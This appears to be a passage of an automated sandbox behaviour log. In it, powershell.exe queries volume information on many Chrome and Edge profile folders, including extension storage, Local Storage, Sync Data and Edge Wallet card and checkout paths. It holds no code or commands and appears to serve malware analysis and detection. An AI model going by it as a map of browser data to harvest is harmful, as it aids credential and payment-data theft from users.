Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\GrShaderCache VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\MEIPreload VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\OptimizationGuidePredictionModels VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\OptimizationHints VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\OriginTrials VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\PKIMetadata VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\segmentation_platform VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation\6498.2023.8.1 VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Download Service VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\el VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\es VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\es_419 VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\et VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\eu VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fa VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fi VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fil VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fr_CA VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\gl VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\gu VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hi VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hu VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hy VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\id VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\is VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\it VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ja VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ka VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\kk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\km VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\kn VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ko VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lo VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lt VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lv VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ml VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\mn VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\mr VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ms VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\my VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ne VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\nl VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\no VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pa VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pl VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pt_BR VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pt_PT VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ru VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\si VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sr VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sv VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\tr VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\vi VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zu VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_metadata VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.0_0 VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.0_0\_metadata VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Segmentation Platform VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Segmentation Platform\SegmentInfoDB VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Segmentation Platform\SignalDB VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Segmentation Platform\SignalStorageConfigDB VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\45553bce-41a3-4fff-adb5-94a1080d3389 VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\optimization_guide_hint_cache_store VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\optimization_guide_model_metadata_store VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\EADPData Component VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\EADPData Component\4.0.2.33 VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Designer VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Designer\1.0.0.20 VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Fre VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0 VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Travel VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Travel\1.0.0.2 VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19 VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Mini-Wallet VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Notification VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Tokenized-Card VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Wallet-Checkout VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\bnpl VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\ar VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\de VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\en-GB VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\es VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\fr VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\id VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\it VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\ja VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\nl VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\pt-PT VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\sv VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\zh-Hans VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\zh-Hant VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\ar VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\id VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\it VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\ja VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\nl VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\pt-BR VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\pt-PT VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\ru VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\sv VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\zh-Hans VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub VolumeInformation
